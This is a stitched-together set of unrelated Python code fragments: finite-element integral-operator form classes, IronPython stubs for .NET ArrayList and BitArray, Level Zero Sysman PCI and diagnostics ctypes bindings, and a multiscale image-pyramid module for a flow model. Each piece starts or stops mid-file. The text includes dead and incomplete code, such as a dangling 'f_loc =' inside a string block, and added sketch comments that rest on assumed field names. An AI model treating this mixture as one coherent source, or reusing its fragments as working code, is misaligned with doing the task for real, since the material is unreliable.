'''
f_loc_det = np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
f_loc += f_loc_det.reshape((n_dofs_test*n_dofs_trial,), order='F')
'''
f_loc += np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
else:
#
# Sampled kernel
#
'''
f_loc_smp = []
for i in range(n_dofs_trial):
f_loc_smp.append(np.dot(test.T, (trial[:,i]*wKer.T).T))
f_loc += np.concatenate(f_loc_smp, axis=0)
'''
for i in range(n_dofs_trial):
f_loc[:,i,:] += np.dot(test.T, (trial[:,i]*wKer.T).T)
#
# Initialize zero local matrix if necessary
#
if f_loc is None:
if self.type == 'constant':
#
# Constant form
#
if n_samples is None:
#
# Deterministic form
#
f_loc = 0
else:
#
# Sampled form
#
f_loc = np.zeros(n_samples)
elif self.type=='linear':
#
# Linear form
#
n_dofs_test = self.test.dofhandler().element.n_dofs()
if n_samples is None:
#
# Deterministic form
#
f_loc = np.zeros(n_dofs_test)
else:
#
# Sampled form
#
f_loc = np.zeros((n_dofs_test, n_samples))
elif self.type=='bilinear':
#
# Bilinear form
#
n_dofs_test = self.test.dofhandler().element.n_dofs()
n_dofs_trial = self.trial.dofhandler().element.n_dofs()
if n_samples is None:
#
# Deterministic form
#
f_loc = np.zeros((n_dofs_test, n_dofs_trial))
else:
#
# Sampled form
#
f_loc = np.zeros((n_dofs_test, n_dofs_trial, n_samples))
#
# Return f_loc
#
return f_loc
"""
for region in regions:
n_samples = kernel.n_samples
if self.test is not None:
#
# Need test function
#
drv = parse_derivative_info(self.test.derivative)
test_etype = self.test.element.element_type()
test = phi[region][test_etype][drv]
n_dofs_test = test.shape[1]
if self.trial is not None:
#
# Need trial function
#
drv = parse_derivative_info(self.trial.derivative)
trial_etype = self.trial.element.element_type()
trial = phi[region][trial_etype][drv]
n_dofs_trial = trial.shape[1]
#
# Bilinear form
#
if n_samples is None:
#
# Deterministic Kernel
#
f_loc = np.dot(test.T, np.dot(np.diag(wg[region]*Ker),trial))
f_loc.reshape((n_dofs_test*n_dofs_trial,1), order='F')
else:
#
# Sampled kernel
#
f_loc = np.dot(test.T, np.reshape(np.kron(trial, wKer),(n_gauss,-1), order='F'))
f_loc.reshape((n_dofs_test*n_dofs_trial, n_samples), order='F')
#
# Extract local dofs
#
rows, cols = np.meshgrid(np.arange(n_dofs_test),
np.arange(n_dofs_trial),
indexing='ij')
rows = rows.ravel()
cols = cols.ravel()
return f_loc, rows, cols
else:
#
# Linear Form
#
rows = np.arange(n_dofs_test)
return f_loc, rows
else:
#
# Simple integral
#
f_loc =
return f_loc
"""
class IIForm(Form):
"""
Bilinear form arising from the interpolatory approximation of an integral
operator.
Cu(x) = I_D k(x,y) u(y) dy
Ku(x)_i = I_D k(xi,y) u(y) dy, i=1,...,n_dofs
"""
def __init__(self, kernel=None, trial=None, test=None, dmu='dx', flag=None):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
'dv' - integrate over a vertex
*flag: str/int/tuple cell/half_edge/vertex marker
"""
#
# Initialize form
#
Form.__init__(self, kernel=kernel, trial=trial, test=test,
dmu=dmu, flag=flag)
#
# Checks
#
assert trial is not None and test is not None,\
'Both trial and test functions should be specified.'
def eval(self, cell, xg, wg, phi, dofs):
"""
Evaluate the local bilinear form
I_{Ej} k(xi, y) phij(y)dy phii(x) for all dof-vertices xi
where Ej is a mesh cell
Inputs:
cell: Cell, containing subregions over which Form is defined
x: (n, dim) array of interpolation points over mesh
xg: Gaussian quadrature points
wg: Gaussian quadrature weights
phi: shape functions evaluated at quadrature points
"""
# =====================================================================
# Interpolate in the test function component
# =====================================================================
test = self.test
x = test.dofhandler().get_dof_vertices(test.subforest_flag())
n = x.shape[0]
# =====================================================================
# Specify trial function
# =====================================================================
trial = self.trial
# Number of dofs
n_dofs = trial.dofhandler().element.n_dofs()
f_loc = None
for reg in self.regions(cell):
# Get trial functions evaluated at Gauss nodes
phi_g = phi[reg][trial]
x_g = xg[reg]
w_g = wg[reg]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
f_loc = np.zeros((n,n_dofs))
#
# Evaluate covariance function at the local Gauss points
#
n_gauss = x_g.shape[0]
ii,jj = np.meshgrid(np.arange(n),np.arange(n_gauss), indexing='ij')
x = (x[ii.ravel(),:],x_g[jj.ravel(),:])
"""
if self.dim == 1:
x1, x2 = x[ii.ravel()], x_g[jj.ravel()]
elif self.dim == 2:
"""
C_loc = self.kernel.eval(x, region=reg, cell=cell,
phi=phi[reg], dofs=dofs[reg])
C_loc = C_loc.reshape(n,n_gauss)
#
# Compute local integral
#
# Weight shape functions
Wphi = np.diag(w_g).dot(phi_g)
# Combine
f_loc += C_loc.dot(Wphi)
return f_loc
class IPForm(Form):
"""
Bilinear form arising from the projection based approximation of an integral
operator.
Cu(x) = I_D k(x,y) u(y) dy
Kij = I_D I_D k(x,y) phij(y)dy phii(x) dx,
Note: The approximation of Cu(x) is given by
Cu(x) ~= M^{-1} K u
"""
def __init__(self, kernel=None, trial=None, test=None, dmu='dx', flag=None):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
'dv' - integrate over a vertex
*flag: str/int/tuple cell/half_edge/vertex marker
"""
#
# Initialize form
#
Form.__init__(self, kernel=kernel, trial=trial, test=test, dmu=dmu, flag=flag)
#
# Checks
#
assert trial is not None and test is not None,\
'Integral forms have both test and trial functions'
for f in kernel.f():
assert f.n_variables()==2, 'Integral kernel must be bivariate.'
def eval(self, cells, xg, wg, phi, dofs):
"""
Evaluates the local bilinear form
I_{Ei} I_{Ej} k(x,y) phij(y) dy phii(x) dx,
where Ei, Ej are mesh cells
Inputs:
cells: Cells (2,) pair, containing subregions over which Form is defined
xg: dict, (2,) pair of Gaussian quadrature points
wg: dict, (2,) pair of Gaussian quadrature weights
phi: (2,) pair of shape functions evaluated at quadrature points
"""
# Cells
ci, cj = cells
# Determine integration regions
regi = self.regions(ci)
regj = self.regions(cj)
# =====================================================================
# Specify the test and trial functions
# =====================================================================
test = self.test
trial = self.trial
# Degrees of freedom
n_dofsi = self.test.dofhandler().element.n_dofs()
n_dofsj = self.trial.dofhandler().element.n_dofs()
# Sample size
n_samples = self.kernel.n_subsample()
f_loc = None
for regi in self.regions(ci):
for regj in self.regions(cj):
# Access test(i) and trial(j) functions
phii = phi[0][regi][test]
phij = phi[1][regj][trial]
# Get quadrature nodes
xi_g = xg[0][regi]
xj_g = xg[1][regj]
# Get quadrature weights
wi_g = wg[0][regi]
wj_g = wg[1][regj]
# Get dofs
dofi = dofs[0][regi]
dofj = dofs[1][regj]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
if n_samples==1:
f_loc = np.zeros((n_dofsi,n_dofsj))
else:
f_loc = np.zeros((n_dofsi,n_dofsj,n_samples))
#
# Evaluate kernel function at the local Gauss points
#
n_gauss = xi_g.shape[0]
ig = np.arange(n_gauss)
ii,jj = np.meshgrid(ig,ig,indexing='ij')
x = (xi_g[ii.ravel(),:],xj_g[jj.ravel(),:])
"""
if self.dim() == 1:
x1, x2 = xi_g[ii.ravel()], xj_g[jj.ravel()]
elif self.dim() == 2:
x1, x2 = xi_g[ii.ravel(),:],xj_g[jj.ravel(),:]
"""
#x, phi=None, cell=None, region=None, dofs=None)
C_loc = self.kernel.eval(x, cell=(ci,cj), region=(regi, regj),
phi=(phi[0][regi],phi[1][regj]),
dofs=(dofi,dofj))
C_loc = C_loc.reshape(n_gauss,n_gauss)
#
# Compute local integral
#
# Weight shape functions
Wphii = np.diag(wi_g).dot(phii)
Wphij = np.diag(wj_g).dot(phij)
# Combine
f_loc += np.dot(Wphii.T, C_loc.dot(Wphij))
# Return local form
return f_loc
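# Hedged sketch of the Note in the IPForm docstring: once the mass matrix M and the
# kernel matrix K (entries Kij above) have been assembled, Cu is approximated dof-wise
# by solving M c = K u. The assembler names below are hypothetical stand-ins; only the
# final solve illustrates the M^{-1} K u step.
#
#     from scipy.sparse.linalg import spsolve
#     M = assemble_mass(...)            # hypothetical: (n_dofs, n_dofs) mass matrix
#     K = assemble_kernel(...)          # hypothetical: (n_dofs, n_dofs) matrix of Kij
#     c = spsolve(M.tocsc(), K.dot(u))  # coefficients of Cu ~= M^{-1} K u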
'''
class IForm(Form):
"""
Bilinear form for an integral operator
Cu(x) = I_D k(x,y) u(y) dy
TODO: Replace with IIForm and IPForm
"""
def __init__(self, kernel, trial=None, test=None, dmu='dx', flag=None,
form_type='projection'):
"""
Constructor
Inputs:
*kernel: Kernel, specifying the form's kernel
*trial: Basis, basis function representing the trial space
*test: Basis, basis function representing the test space
*dmu: str, area of integration
'dx' - integrate over a cell
'ds' - integrate over an edge
*flag: str/int/tuple cell/half_edge/vertex marker
*approximation_type: str ('projection' or 'interpolation').
"""
self.type = 'bilinear'
self.flag = flag
#
# Trial space
#
assert isinstance(trial, Basis),\
'Input "trial" should be of type "Basis".'
self.trial = trial
# Dimension
self.__dim = self.trial.element.dim()
#
# Test space
#
assert isinstance(test, Basis),\
'Input "test" should be of type "Basis".'
self.test = test
#
# Check | |
value can be null.
"""
pass
def InsertRange(self,index,c):
"""
InsertRange(self: ArrayList,index: int,c: ICollection)
Inserts the elements of a collection into the System.Collections.ArrayList at the specified index.
index: The zero-based index at which the new elements should be inserted.
c: The System.Collections.ICollection whose elements should be inserted into the System.Collections.ArrayList. The collection itself cannot be null,but it can contain
elements that are null.
"""
pass
def LastIndexOf(self,value,startIndex=None,count=None):
"""
LastIndexOf(self: ArrayList,value: object) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the entire System.Collections.ArrayList.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: The zero-based index of the last occurrence of value within the entire the System.Collections.ArrayList,if found; otherwise,-1.
LastIndexOf(self: ArrayList,value: object,startIndex: int) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the range of elements in the System.Collections.ArrayList that
extends from the first element to the specified index.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the backward search.
Returns: The zero-based index of the last occurrence of value within the range of elements in the System.Collections.ArrayList that extends from the first element to startIndex,if
found; otherwise,-1.
LastIndexOf(self: ArrayList,value: object,startIndex: int,count: int) -> int
Searches for the specified System.Object and returns the zero-based index of the last occurrence within the range of elements in the System.Collections.ArrayList that
contains the specified number of elements and ends at the specified index.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the backward search.
count: The number of elements in the section to search.
Returns: The zero-based index of the last occurrence of value within the range of elements in the System.Collections.ArrayList that contains count number of elements and ends at
startIndex,if found; otherwise,-1.
"""
pass
@staticmethod
def ReadOnly(list):
"""
ReadOnly(list: IList) -> IList
Returns a read-only System.Collections.IList wrapper.
list: The System.Collections.IList to wrap.
Returns: A read-only System.Collections.IList wrapper around list.
ReadOnly(list: ArrayList) -> ArrayList
Returns a read-only System.Collections.ArrayList wrapper.
list: The System.Collections.ArrayList to wrap.
Returns: A read-only System.Collections.ArrayList wrapper around list.
"""
pass
def Remove(self,obj):
"""
Remove(self: ArrayList,obj: object)
Removes the first occurrence of a specific object from the System.Collections.ArrayList.
obj: The System.Object to remove from the System.Collections.ArrayList. The value can be null.
"""
pass
def RemoveAt(self,index):
"""
RemoveAt(self: ArrayList,index: int)
Removes the element at the specified index of the System.Collections.ArrayList.
index: The zero-based index of the element to remove.
"""
pass
def RemoveRange(self,index,count):
"""
RemoveRange(self: ArrayList,index: int,count: int)
Removes a range of elements from the System.Collections.ArrayList.
index: The zero-based starting index of the range of elements to remove.
count: The number of elements to remove.
"""
pass
@staticmethod
def Repeat(value,count):
"""
Repeat(value: object,count: int) -> ArrayList
Returns an System.Collections.ArrayList whose elements are copies of the specified value.
value: The System.Object to copy multiple times in the new System.Collections.ArrayList. The value can be null.
count: The number of times value should be copied.
Returns: An System.Collections.ArrayList with count number of elements,all of which are copies of value.
"""
pass
def Reverse(self,index=None,count=None):
"""
Reverse(self: ArrayList)
Reverses the order of the elements in the entire System.Collections.ArrayList.
Reverse(self: ArrayList,index: int,count: int)
Reverses the order of the elements in the specified range.
index: The zero-based starting index of the range to reverse.
count: The number of elements in the range to reverse.
"""
pass
def SetRange(self,index,c):
"""
SetRange(self: ArrayList,index: int,c: ICollection)
Copies the elements of a collection over a range of elements in the System.Collections.ArrayList.
index: The zero-based System.Collections.ArrayList index at which to start copying the elements of c.
c: The System.Collections.ICollection whose elements to copy to the System.Collections.ArrayList. The collection itself cannot be null,but it can contain elements that are
null.
"""
pass
def Sort(self,*__args):
"""
Sort(self: ArrayList)
Sorts the elements in the entire System.Collections.ArrayList.
Sort(self: ArrayList,comparer: IComparer)
Sorts the elements in the entire System.Collections.ArrayList using the specified comparer.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- A null reference (Nothing in Visual Basic) to use the System.IComparable implementation
of each element.
Sort(self: ArrayList,index: int,count: int,comparer: IComparer)
Sorts the elements in a range of elements in System.Collections.ArrayList using the specified comparer.
index: The zero-based starting index of the range to sort.
count: The length of the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- A null reference (Nothing in Visual Basic) to use the System.IComparable implementation
of each element.
"""
pass
@staticmethod
def Synchronized(list):
"""
Synchronized(list: IList) -> IList
Returns an System.Collections.IList wrapper that is synchronized (thread safe).
list: The System.Collections.IList to synchronize.
Returns: An System.Collections.IList wrapper that is synchronized (thread safe).
Synchronized(list: ArrayList) -> ArrayList
Returns an System.Collections.ArrayList wrapper that is synchronized (thread safe).
list: The System.Collections.ArrayList to synchronize.
Returns: An System.Collections.ArrayList wrapper that is synchronized (thread safe).
"""
pass
def ToArray(self,type=None):
"""
ToArray(self: ArrayList) -> Array[object]
Copies the elements of the System.Collections.ArrayList to a new System.Object array.
Returns: An System.Object array containing copies of the elements of the System.Collections.ArrayList.
ToArray(self: ArrayList,type: Type) -> Array
Copies the elements of the System.Collections.ArrayList to a new array of the specified element type.
type: The element System.Type of the destination array to create and copy elements to.
Returns: An array of the specified element type containing copies of the elements of the System.Collections.ArrayList.
"""
pass
def TrimToSize(self):
"""
TrimToSize(self: ArrayList)
Sets the capacity to the actual number of elements in the System.Collections.ArrayList.
"""
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,false.
"""
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
@staticmethod
def __new__(self,*__args):
"""
__new__(cls: type)
__new__(cls: type,capacity: int)
__new__(cls: type,c: ICollection)
"""
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
Capacity=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the number of elements that the System.Collections.ArrayList can contain.
Get: Capacity(self: ArrayList) -> int
Set: Capacity(self: ArrayList)=value
"""
Count=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the number of elements actually contained in the System.Collections.ArrayList.
Get: Count(self: ArrayList) -> int
"""
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Collections.ArrayList has a fixed size.
Get: IsFixedSize(self: ArrayList) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Collections.ArrayList is read-only.
Get: IsReadOnly(self: ArrayList) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Collections.ArrayList is synchronized (thread safe).
Get: IsSynchronized(self: ArrayList) -> bool
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Collections.ArrayList.
Get: SyncRoot(self: ArrayList) -> object
"""
class BitArray(object):
"""
Manages a compact array of bit values,which are represented as Booleans,where true indicates that the bit is on (1) and false indicates the bit is off (0).
BitArray(length: int)
BitArray(length: int,defaultValue: bool)
BitArray(bytes: Array[Byte])
BitArray(values: Array[bool])
BitArray(values: Array[int])
BitArray(bits: BitArray)
"""
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return BitArray()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def And(self,value):
"""
And(self: BitArray,value: BitArray) -> BitArray
Performs the bitwise | |
[out] Indicates if ::zes_pci_stats_t.packetCounter will have valid
## values
("haveReplayCounters", ze_bool_t) ## [out] Indicates if ::zes_pci_stats_t.replayCounter will have valid
## values
]
###############################################################################
## @brief PCI link status
class zes_pci_link_status_v(IntEnum):
UNKNOWN = 0 ## The link status could not be determined
GOOD = 1 ## The link is up and operating as expected
QUALITY_ISSUES = 2 ## The link is up but has quality and/or bandwidth degradation
STABILITY_ISSUES = 3 ## The link has stability issues and preventing workloads making forward
## progress
class zes_pci_link_status_t(c_int):
def __str__(self):
return str(zes_pci_link_status_v(self.value))
###############################################################################
## @brief PCI link quality degradation reasons
class zes_pci_link_qual_issue_flags_v(IntEnum):
REPLAYS = ZE_BIT(0) ## A significant number of replays are occurring
SPEED = ZE_BIT(1) ## There is a degradation in the maximum bandwidth of the link
class zes_pci_link_qual_issue_flags_t(c_int):
def __str__(self):
return hex(self.value)
###############################################################################
## @brief PCI link stability issues
class zes_pci_link_stab_issue_flags_v(IntEnum):
RETRAINING = ZE_BIT(0) ## Link retraining has occurred to deal with quality issues
class zes_pci_link_stab_issue_flags_t(c_int):
def __str__(self):
return hex(self.value)
###############################################################################
## @brief Dynamic PCI state
class zes_pci_state_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in][optional] pointer to extension-specific structure
("status", zes_pci_link_status_t), ## [out] The current status of the port
("qualityIssues", zes_pci_link_qual_issue_flags_t), ## [out] If status is ::ZES_PCI_LINK_STATUS_QUALITY_ISSUES,
## then this gives a combination of ::zes_pci_link_qual_issue_flag_t for
## quality issues that have been detected;
## otherwise, 0 indicates there are no quality issues with the link at
## this time.
("stabilityIssues", zes_pci_link_stab_issue_flags_t), ## [out] If status is ::ZES_PCI_LINK_STATUS_STABILITY_ISSUES,
## then this gives a combination of ::zes_pci_link_stab_issue_flag_t for
## reasons for the connection instability;
## otherwise, 0 indicates there are no connection stability issues at
## this time.
("speed", zes_pci_speed_t) ## [out] The current port configure speed
]
###############################################################################
## @brief PCI bar types
class zes_pci_bar_type_v(IntEnum):
MMIO = 0 ## MMIO registers
ROM = 1 ## ROM aperture
MEM = 2 ## Device memory
class zes_pci_bar_type_t(c_int):
def __str__(self):
return str(zes_pci_bar_type_v(self.value))
###############################################################################
## @brief Properties of a pci bar
class zes_pci_bar_properties_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("type", zes_pci_bar_type_t), ## [out] The type of bar
("index", c_ulong), ## [out] The index of the bar
("base", c_ulonglong), ## [out] Base address of the bar.
("size", c_ulonglong) ## [out] Size of the bar.
]
###############################################################################
## @brief Properties of a pci bar, including the resizable bar.
class zes_pci_bar_properties_1_2_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("type", zes_pci_bar_type_t), ## [out] The type of bar
("index", c_ulong), ## [out] The index of the bar
("base", c_ulonglong), ## [out] Base address of the bar.
("size", c_ulonglong), ## [out] Size of the bar.
("resizableBarSupported", ze_bool_t), ## [out] Support for Resizable Bar on this device.
("resizableBarEnabled", ze_bool_t) ## [out] Resizable Bar enabled on this device
]
###############################################################################
## @brief PCI stats counters
##
## @details
## - Percent replays is calculated by taking two snapshots (s1, s2) and
## using the equation: %replay = 10^6 * (s2.replayCounter -
## s1.replayCounter) / (s2.maxBandwidth * (s2.timestamp - s1.timestamp))
## - Percent throughput is calculated by taking two snapshots (s1, s2) and
## using the equation: %bw = 10^6 * ((s2.rxCounter - s1.rxCounter) +
## (s2.txCounter - s1.txCounter)) / (s2.maxBandwidth * (s2.timestamp -
## s1.timestamp))
class zes_pci_stats_t(Structure):
_fields_ = [
("timestamp", c_ulonglong), ## [out] Monotonic timestamp counter in microseconds when the measurement
## was made.
## This timestamp should only be used to calculate delta time between
## snapshots of this structure.
## Never take the delta of this timestamp with the timestamp from a
## different structure since they are not guaranteed to have the same base.
## The absolute value of the timestamp is only valid within the
## application and may be different on the next execution.
("replayCounter", c_ulonglong), ## [out] Monotonic counter for the number of replay packets (sum of all
## lanes). Will always be 0 if ::zes_pci_properties_t.haveReplayCounters
## is FALSE.
("packetCounter", c_ulonglong), ## [out] Monotonic counter for the number of packets (sum of all lanes).
## Will always be 0 if ::zes_pci_properties_t.havePacketCounters is
## FALSE.
("rxCounter", c_ulonglong), ## [out] Monotonic counter for the number of bytes received (sum of all
## lanes). Will always be 0 if
## ::zes_pci_properties_t.haveBandwidthCounters is FALSE.
("txCounter", c_ulonglong), ## [out] Monotonic counter for the number of bytes transmitted (including
## replays) (sum of all lanes). Will always be 0 if
## ::zes_pci_properties_t.haveBandwidthCounters is FALSE.
("speed", zes_pci_speed_t) ## [out] The current speed of the link (sum of all lanes)
]
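###############################################################################
## Hedged sketch: percent replay and percent throughput between two snapshots,
## following the formulas documented above. Assumes s1 and s2 are zes_pci_stats_t
## instances and that the link's maximum bandwidth in bytes/s is read from the
## accompanying speed field (zes_pci_speed_t.maxBandwidth -- an assumption about
## where that value lives).
def _pci_utilization(s1, s2):
    dt_us = s2.timestamp - s1.timestamp          # delta time in microseconds
    max_bw = s2.speed.maxBandwidth               # bytes per second (assumed field)
    pct_replay = 1e6 * (s2.replayCounter - s1.replayCounter) / (max_bw * dt_us)
    pct_bw = 1e6 * ((s2.rxCounter - s1.rxCounter) +
                    (s2.txCounter - s1.txCounter)) / (max_bw * dt_us)
    return pct_replay, pct_bw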
###############################################################################
## @brief Diagnostic results
class zes_diag_result_v(IntEnum):
NO_ERRORS = 0 ## Diagnostic completed without finding errors to repair
ABORT = 1 ## Diagnostic had problems running tests
FAIL_CANT_REPAIR = 2 ## Diagnostic had problems setting up repairs
REBOOT_FOR_REPAIR = 3 ## Diagnostics found errors, setup for repair and reboot is required to
## complete the process
class zes_diag_result_t(c_int):
def __str__(self):
return str(zes_diag_result_v(self.value))
###############################################################################
## @brief Diagnostic test index to use for the very first test.
ZES_DIAG_FIRST_TEST_INDEX = 0x0
###############################################################################
## @brief Diagnostic test index to use for the very last test.
ZES_DIAG_LAST_TEST_INDEX = 0xFFFFFFFF
###############################################################################
## @brief Diagnostic test
class zes_diag_test_t(Structure):
_fields_ = [
("index", c_ulong), ## [out] Index of the test
("name", c_char * ZES_STRING_PROPERTY_SIZE) ## [out] Name of the test
]
###############################################################################
## @brief Diagnostics test suite properties
class zes_diag_properties_t(Structure):
_fields_ = [
("stype", zes_structure_type_t), ## [in] type of this structure
("pNext", c_void_p), ## [in,out][optional] pointer to extension-specific structure
("onSubdevice", ze_bool_t), ## [out] True if the resource is located on a sub-device; false means
## that the resource is on the device of the calling Sysman handle
("subdeviceId", c_ulong), ## [out] If onSubdevice is true, this gives the ID of the sub-device
("name", c_char * ZES_STRING_PROPERTY_SIZE), ## [out] Name of the diagnostics test suite
("haveTests", ze_bool_t) ## [out] Indicates if this test suite has individual tests which can be
## run separately (use the function ::zesDiagnosticsGetTests() to get the
## list of these tests)
]
###############################################################################
## @brief Accelerator engine groups
class zes_engine_group_v(IntEnum):
ALL = 0 ## Access information about all engines combined.
COMPUTE_ALL = 1 ## Access information about all compute engines combined. Compute engines
## can only process compute kernels (no 3D content).
MEDIA_ALL = 2 ## Access information about all media engines combined.
COPY_ALL = 3 ## Access information about all copy (blitter) engines combined.
COMPUTE_SINGLE = 4 ## Access information about a single compute engine - this is an engine
## that can process compute kernels. Note that single engines may share
## the same underlying accelerator resources as other engines so activity
## of such an engine may not be indicative of the underlying resource
## utilization - use ::ZES_ENGINE_GROUP_3D_RENDER_COMPUTE_ALL for that.
RENDER_SINGLE = 5 ## Access information about a single render engine - this is an engine
## that can process both 3D content and compute kernels. Note that single
## engines may share the same underlying accelerator resources as other
## engines so activity of such an engine may not be indicative of the
## underlying resource utilization - use
## ::ZES_ENGINE_GROUP_3D_RENDER_COMPUTE_ALL for that.
MEDIA_DECODE_SINGLE = 6 ## Access information about a single media decode engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_MEDIA_ALL
## for that.
MEDIA_ENCODE_SINGLE = 7 ## Access information about a single media encode engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_MEDIA_ALL
## for that.
COPY_SINGLE = 8 ## Access information about a single copy (blitter) engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_COPY_ALL
## for that.
MEDIA_ENHANCEMENT_SINGLE = 9 ## Access information about a single media | |
import argparse
import math
import numpy as np
import scipy.interpolate as interpolate
import torch
import torch.nn as nn
import torch.nn.functional as F
import lib.layers as layers
from .regularization import create_regularization_fns
from .layers.elemwise import _logit as logit
from .layers.elemwise import _sigmoid as sigmoid
from .utils import logpx_to_bpd
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def normal_logprob(x, mu=0, sigma=1):
if sigma is None:
sigma = 1.0
logZ = -math.log(sigma) -0.5 * math.log(2 * math.pi)
return logZ - ((x - mu)/sigma).pow(2) / 2
def avg2d(x):
bs, c, w, h = x.shape
if x.shape[1:] == (3, 1, 1):
return x.mean(1, keepdim=True)
else:
kernel = torch.tensor([[0.25, 0.25], [0.25, 0.25]]).unsqueeze(0).unsqueeze(0).expand(c, 1, 2, 2).to(x.device)
return F.conv2d(x.float(), kernel, stride=2, groups=c)
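# Note (hedged): apart from the (3, 1, 1) special case above, this grouped 2x2
# convolution with stride 2 and uniform 0.25 weights is equivalent to
# F.avg_pool2d(x.float(), kernel_size=2) for inputs with even spatial dimensions.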
def avg_2d_in_1d(x, ch='height'):
assert ch in ['height', 'width']
if x.shape[1:] == (3, 1, 1):
return x.mean(1, keepdim=True)
else:
if ch == 'width':
return (x[:, :, :, ::2] + x[:, :, :, 1::2])/2
else:
return (x[:, :, ::2, :] + x[:, :, 1::2, :])/2
class Downsample(nn.Module):
def __init__(self, tau=0.5, iters=1):
super().__init__()
self.heat = Heat(tau, iters)
#self.pick = Pick()
def forward(self, X, sh):
Y, _ = self.heat(X)
out = F.interpolate(Y, size=sh, mode='nearest')
return out
class Pyramid(nn.Module):
def __init__(self, image_shapes, mode='image'):
super().__init__()
self.image_shapes = image_shapes
self.mode = mode
def forward(self, img):
# img: [B, ch, height, width]
imgs = []
current = img.float()
imgs.append(current)
if self.mode == '1d':
l = 0
while l < len(self.image_shapes) - 1:
if l % 2 == 0:
current = avg_2d_in_1d(current, ch='height')
else:
current = avg_2d_in_1d(current, ch='width')
imgs.append(current)
l += 1
else:
for i in range(len(self.image_shapes)-1):
current = avg2d(current)
imgs.append(current)
imgs.reverse()
return imgs
def make_image_shapes(max_scales, im_size, im_ch, factor=0.5, mode='image'):
# Data shapes
image_shapes = []
if mode == '1d':
MAX = int(np.log2(im_size)*2 + 1)
assert max_scales <= (MAX+1 if im_ch == 3 else MAX), f"max_scales cannot be greater than {MAX+1 if im_ch == 3 else MAX}, given {max_scales}"
image_shapes.append((im_ch, im_size, im_size))
size_old = im_size
l = 0
while l < MAX-1:
if l % 2 == 0:
size = int(round(size_old * factor))
image_shapes.append((im_ch, size, size_old))
else:
image_shapes.append((im_ch, size, size))
size_old = size
l += 1
if im_ch == 3:
image_shapes.append((1, 1, 1))
else:
MAX = int(np.log2(im_size) + 1)
assert max_scales <= (MAX+1 if im_ch == 3 else MAX), f"max_scales cannot be greater than {MAX+1 if im_ch == 3 else MAX}, given {max_scales}"
for l in range(MAX):
size = int(round(im_size * factor**l))
image_shapes.append((im_ch, size, size))
if im_ch == 3:
image_shapes.append((1, 1, 1))
image_shapes = image_shapes[:max_scales]
image_shapes.reverse()
return image_shapes
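# Worked example (hedged, values follow from the logic above): for im_size=32,
# im_ch=3, factor=0.5, mode='image' and max_scales=3, the full pyramid is
# [(3,32,32), (3,16,16), (3,8,8), (3,4,4), (3,2,2), (3,1,1), (1,1,1)]; keeping the
# three finest scales and reversing gives [(3,8,8), (3,16,16), (3,32,32)].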
def std_for_shapes_1d(norm_res, input_shapes):
# Actual norm_res (128) is double the default (64)! Because std formula has an erroneous "+ 1".
# Retaining it for legacy.
stds = []
for shape in input_shapes:
stds.append(np.sqrt(1/2**(2*np.log2(norm_res) - np.log2(shape[1]) - np.log2(shape[2]) + 1)))
if input_shapes[-1][0] == 3 and input_shapes[0] == (1, 1, 1):
